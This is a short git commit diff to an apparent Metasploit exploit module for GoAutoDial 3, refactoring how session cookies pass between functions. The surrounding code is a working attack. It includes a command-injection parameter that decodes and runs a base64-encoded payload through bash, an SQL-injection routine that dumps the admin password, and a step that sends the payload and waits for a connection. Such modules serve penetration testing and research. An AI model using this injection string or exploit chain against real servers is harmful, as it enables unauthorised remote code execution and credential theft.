Updated module to use an instance variable for using HTTP session tokens across functions.

mccurls · mccurls · commit 8c23769cbcd3 · 2017-06-18T12:59:34.000+10:00
diff --git a/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb b/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
@@ -100,7 +100,7 @@ def sqli_admin_pass(cookies)
   #
   # Run the actual exploit
   #
-  def execute_command(cookies)
+  def execute_command()
 
     encoded = Rex::Text.encode_base64("#{payload.encoded}")
     params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
@@ -112,7 +112,7 @@ def execute_command(cookies)
       'headers'   => {
       'User-Agent' => 'Mozilla/5.0',
       'Accept-Encoding' => 'identity',
-      'Cookie' => cookies
+      'Cookie' => @cookie
 
       }
       })
@@ -130,8 +130,9 @@ def exploit()
       print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
     end
 
+    @cookie = res1.get_cookies
     print_status("#{rhost}:#{rport} - Dumping admin password...")
-    res = sqli_admin_pass(res1.get_cookies)
+    res = sqli_admin_pass(@cookie)
 
     if res
       print_good(res.body)
@@ -140,6 +141,6 @@ def exploit()
     end
     print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
 
-    execute_command(res1.get_cookies)
+    execute_command()
   end
 end
